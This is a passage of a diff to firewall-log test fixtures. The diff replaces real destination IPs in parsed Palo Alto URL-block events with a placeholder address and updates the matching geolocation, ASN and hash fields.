16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -7484,7 +7548,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:l+VVTNzHKEhzOIqE/8PVt4xidPQ=" + "community_id": "1:r1f3rhFYHx9LM+VykIhEs41wnu0=" } }, "threat_category": "unknown", @@ -7529,8 +7593,8 @@ ], "network": { "community_id": [ - "1:ZWPOx8XRihDI9+WqUDIHe1OyInQ=", - "1:l+VVTNzHKEhzOIqE/8PVt4xidPQ=" + "1:xvKK6D+0SZ3Et3BSKLgAX+7nwag=", + "1:r1f3rhFYHx9LM+VykIhEs41wnu0=" ], "transport": "tcp", "application": "ssl", @@ -7569,14 +7633,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768155526Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691904200Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -7599,29 +7663,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7637,14 +7700,14 @@ "port": 53101, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -7659,7 +7722,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:/GTSxrH684FoBXpyEBepCy2M81Q=" + "community_id": "1:v8zN/HG83YdJLlQ7mL/SY7vviOI=" } }, "threat_category": "unknown", @@ -7704,8 +7767,8 @@ ], "network": { "community_id": [ - "1:T7UcACShDtZytIaufQKjiQ8jkhM=", - "1:/GTSxrH684FoBXpyEBepCy2M81Q=" + "1:40MD/GuIwR83Uf3M4As6pXJG2E8=", + "1:v8zN/HG83YdJLlQ7mL/SY7vviOI=" ], "transport": "tcp", "application": "ssl", @@ -7744,14 +7807,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768191562Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691908400Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -7774,29 +7837,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7812,14 +7874,14 @@ "port": 53104, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -7834,7 +7896,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:z/innn6bIUB0vbGtF+NoTKxtaCQ=" + "community_id": "1:wf5lEguVgQsAUnhrU+YouQAxkh8=" } }, "threat_category": "unknown", @@ -7879,8 +7941,8 @@ ], "network": { "community_id": [ - "1:v2q2MvHECPCP6FDhZOfU9EhWDmw=", - "1:z/innn6bIUB0vbGtF+NoTKxtaCQ=" + "1:AjOdj1GAtVoz65E9UEfPtazi3B4=", + "1:wf5lEguVgQsAUnhrU+YouQAxkh8=" ], "transport": "tcp", "application": "ssl", @@ -7919,14 +7981,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768199510Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691913400Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -7949,29 +8011,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7987,14 +8048,14 @@ "port": 53107, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -8009,7 +8070,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:7H4lb05cbTOpCa4pIgruj3M2WrY=" + "community_id": "1:A5t6X24NgS7mAag+SYzKa1Dk6Fc=" } }, "threat_category": "unknown", @@ -8054,8 +8115,8 @@ ], "network": { "community_id": [ - "1:/FL+10fyEBLqVR4oJrH3NBEx/pg=", - "1:7H4lb05cbTOpCa4pIgruj3M2WrY=" + "1:T0Ogviwzzsc+cwiM0Fh+DrlGSGI=", + "1:A5t6X24NgS7mAag+SYzKa1Dk6Fc=" ], "transport": "tcp", "application": "ssl", @@ -8094,14 +8155,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768203612Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691919900Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -8124,29 +8185,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8162,14 +8222,14 @@ "port": 53108, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -8184,7 +8244,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:G3GfJYWnCjo8Ato/aBgr49UKGTI=" + "community_id": "1:14BTIIGeTcGSNZJDnjEduxdXfgw=" } }, "threat_category": "unknown", @@ -8229,8 +8289,8 @@ ], "network": { "community_id": [ - "1:abQPCp6V8x2Fumiz5x/+vZnuNfM=", - "1:G3GfJYWnCjo8Ato/aBgr49UKGTI=" + "1:wU3xR7CIw4IWAct08AnxyKRh9iI=", + "1:14BTIIGeTcGSNZJDnjEduxdXfgw=" ], "transport": "tcp", "application": "ssl", @@ -8269,14 +8329,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768207539Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691924600Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -8299,29 +8359,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8337,14 +8396,14 @@ "port": 53109, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -8359,7 +8418,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:Ni0ZlLTDuNH8F3hFm9nLZkj/SKI=" + "community_id": "1:Vw9yNfip9vmzNdY3gjo9ajxkxaU=" } }, "threat_category": "unknown", @@ -8404,8 +8463,8 @@ ], "network": { "community_id": [ - "1:Ix3Fldb6W5hQx30Bw7Vd5/lm8hw=", - "1:Ni0ZlLTDuNH8F3hFm9nLZkj/SKI=" + "1:uE5isgLEWIN8/Mig2yUOivorXgg=", + "1:Vw9yNfip9vmzNdY3gjo9ajxkxaU=" ], "transport": "tcp", "application": "ssl", @@ -8444,14 +8503,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768211464Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691929300Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -8474,29 +8533,28 @@ "destination": { "nat": { "port": 443, - "ip": "216.58.194.98" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0839, - "lat": 37.3861 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "216.58.194.98" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8512,14 +8570,14 @@ "port": 53118, "ip": "192.168.15.224" }, - "message": "192.168.15.224,216.58.194.98,192.168.1.63,216.58.194.98,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "216.58.194.98" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -8534,7 +8592,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:WQC21tSR1QNUhWYgrcbgaLyTkos=" + "community_id": "1:PA/ZryCD/H/jh73q79O5GKFA1Hw=" } }, "threat_category": "unknown", @@ -8579,8 +8637,8 @@ ], "network": { "community_id": [ - "1:iBwlaPm6awPJaLJMdMMVOH9f5RU=", - "1:WQC21tSR1QNUhWYgrcbgaLyTkos=" + "1:E0CnmmCgablpVNZk6myszTdTEaA=", + "1:PA/ZryCD/H/jh73q79O5GKFA1Hw=" ], "transport": "tcp", "application": "ssl", @@ -8619,14 +8677,14 @@ ], "ip": [ "192.168.15.224", - "216.58.194.98", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768215359Z", - "original": "Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,216.58.194.98,192.168.1.63,216.58.194.98,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691934100Z", + "original": "Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:13.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -8649,26 +8707,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8684,14 +8744,14 @@ "port": 53126, "ip": "192.168.15.224" }, - "message": 